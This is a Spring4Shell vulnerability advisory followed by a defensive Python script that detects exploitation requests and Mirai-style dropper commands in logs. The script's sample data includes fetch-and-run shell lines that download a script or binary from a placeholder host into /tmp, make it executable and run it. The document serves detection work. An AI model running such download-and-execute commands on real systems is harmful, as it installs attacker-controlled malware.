Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially crafted request data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The publicly known exploit requires Spring Framework to be deployed on Tomcat as a WAR with JDK 9 or higher, using spring-webmvc or spring-webflux.
Note: This vulnerability is also known as Spring4Shell or SpringShell.
The RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical vulnerability. Spring4Shell is being actively exploited by threat actors to deploy and weaponize the Mirai malware. This exploitation mainly occurred in the Singapore region. The sample is first downloaded into the “/tmp” folder and then made executable with “chmod”. The “wget.sh” script then downloads the binaries from the attacker’s server and executes the samples.
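Detection logic for the two stages described above, as an added Python example that is not part of the original page: the first part scans HTTP access-log request lines for a data-binding exploitation attempt, the second tags shell command lines that show the dropper sequence (download into /tmp, chmod to make the file executable, fetch or run wget.sh). It assumes the request parameter path class.module.classLoader as the indicator of an exploitation attempt; that path comes from public reporting on Spring4Shell, while the page itself only describes the mechanism as PropertyDescriptor/data-binding abuse. The log lines, the TEST-NET addresses and the wget.sh URL are constructed for the example.

```python
import re
from urllib.parse import unquote

# --- Stage 1: exploitation attempts in HTTP access logs ---------------------
# Assumption (from public Spring4Shell reporting, not from this page): attempts
# pass a property path starting with "class.module.classLoader" as a request
# parameter, often with varied case or URL encoding.
BINDING_INDICATOR = re.compile(r"class\.module\.classloader", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (double encoding is common)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(lines):
    """Return (line_number, method, decoded_target) for each suspicious request.

    Only the request line is inspected: parameters sent in a POST body never
    appear in a standard access log, so those attempts need request-body
    logging or a WAF to be seen at all.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = fully_decode(m.group("target"))
        if BINDING_INDICATOR.search(target):
            hits.append((n, m.group("method"), target))
    return hits


# --- Stage 2: the dropper behaviour described above ---------------------------
DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b")
TMP_DIR = re.compile(r"(^|[\s;&|=\"'])/tmp(/|\b)")
CHMOD = re.compile(r"\bchmod\s+(?:-R\s+)?(\S+)")
WGET_SH = re.compile(r"\bwget\.sh\b")


def mode_grants_exec(mode: str) -> bool:
    """True for symbolic modes adding x (+x, u+rx) or octal modes with any x bit."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])  # last three digits: u/g/o
    return bool(re.search(r"\+[rw]*x", mode))


def classify_command(cmd: str) -> set:
    """Tag one shell command line with the dropper behaviours it exhibits."""
    tags = set()
    if DOWNLOADER.search(cmd) and TMP_DIR.search(cmd):
        tags.add("download_to_tmp")
    m = CHMOD.search(cmd)
    if m and mode_grants_exec(m.group(1)):
        tags.add("chmod_exec")
    if WGET_SH.search(cmd):
        tags.add("wget_sh")
    return tags


def scan_commands(lines):
    """Flag lines that download into /tmp and mark the file executable, or that
    reference the wget.sh stager."""
    hits = []
    for n, cmd in enumerate(lines, 1):
        tags = classify_command(cmd)
        if {"download_to_tmp", "chmod_exec"} <= tags or "wget_sh" in tags:
            hits.append((n, sorted(tags)))
    return hits


# Constructed sample data (not real logs): TEST-NET addresses, placeholder
# parameter values; the third request is double URL-encoded with mixed case.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [01/Apr/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Apr/2022:10:00:02 +0000] "GET /app/greet?class.module.classLoader.X=Y HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Apr/2022:10:00:03 +0000] "POST /app/greet?Class%252Emodule%252EclassLoader%252EX=Y HTTP/1.1" 200 12',
    '203.0.113.7 - - [01/Apr/2022:10:00:04 +0000] "GET /app/greet?name=classLoader HTTP/1.1" 200 12',
]

SAMPLE_COMMANDS = [
    '/bin/sh -c "cd /tmp; wget http://198.51.100.7/wget.sh; chmod +x wget.sh; ./wget.sh"',
    '/bin/sh -c "wget http://198.51.100.7/bot.x86 -O /tmp/bot.x86; chmod 777 /tmp/bot.x86; /tmp/bot.x86"',
    '/usr/bin/wget https://example.org/manual.pdf -O /home/user/manual.pdf',
    '/bin/sh -c "chmod 644 /tmp/notes.txt"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("request indicator:", hit)
    for hit in scan_commands(SAMPLE_COMMANDS):
        print("dropper indicator:", hit)
```

The decode loop matters because the indicator string is trivially hidden behind one or two layers of percent-encoding; the chmod check looks at the actual mode so that a benign `chmod 644` in /tmp does not fire, and the download rule requires both a downloader and a /tmp destination so ordinary wget usage elsewhere on disk is ignored.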